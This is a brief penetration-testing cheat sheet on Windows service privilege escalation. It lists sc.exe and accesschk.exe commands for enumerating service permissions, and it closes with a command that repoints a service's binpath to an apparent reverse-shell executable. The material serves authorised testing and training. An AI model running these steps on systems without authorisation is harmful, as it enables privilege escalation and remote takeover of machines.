| description |
|---|
Basic commands when abusing services to elevate privileges after being identified with a tool such as WinPEAS. |
# Query the configuration of a service
sc.exe qc $service_name
# Query the current status of a service
sc.exe query $service_name
# Modify an option on a service
sc.exe config $service_name $option= $value
# Start and stop a service
net start/stop $service_nameUse Accesschk.exe to validate service permissions:
.\accesschk.exe /accepteula -uwcqv user $service_name- What we are looking for in the output is the
SERVICE_STARTandSERVICE_STOPpermissions. - We also want to confirm that it is running under a user with higher privileges (e.g.,
LocalSystem)
- Validate if you can start/stop the service or the machine. If you cannot then you may not be able to use it to escalate your privileges.
- Check if we can reboot the system with
whoami /priv - An easy way to escalate privileges utilizing a service is to modify the binaries path. The following demonstrates an example of this:
sc config $service_name binpath= "\"C:\Windows\Tasks\reverse.exe\""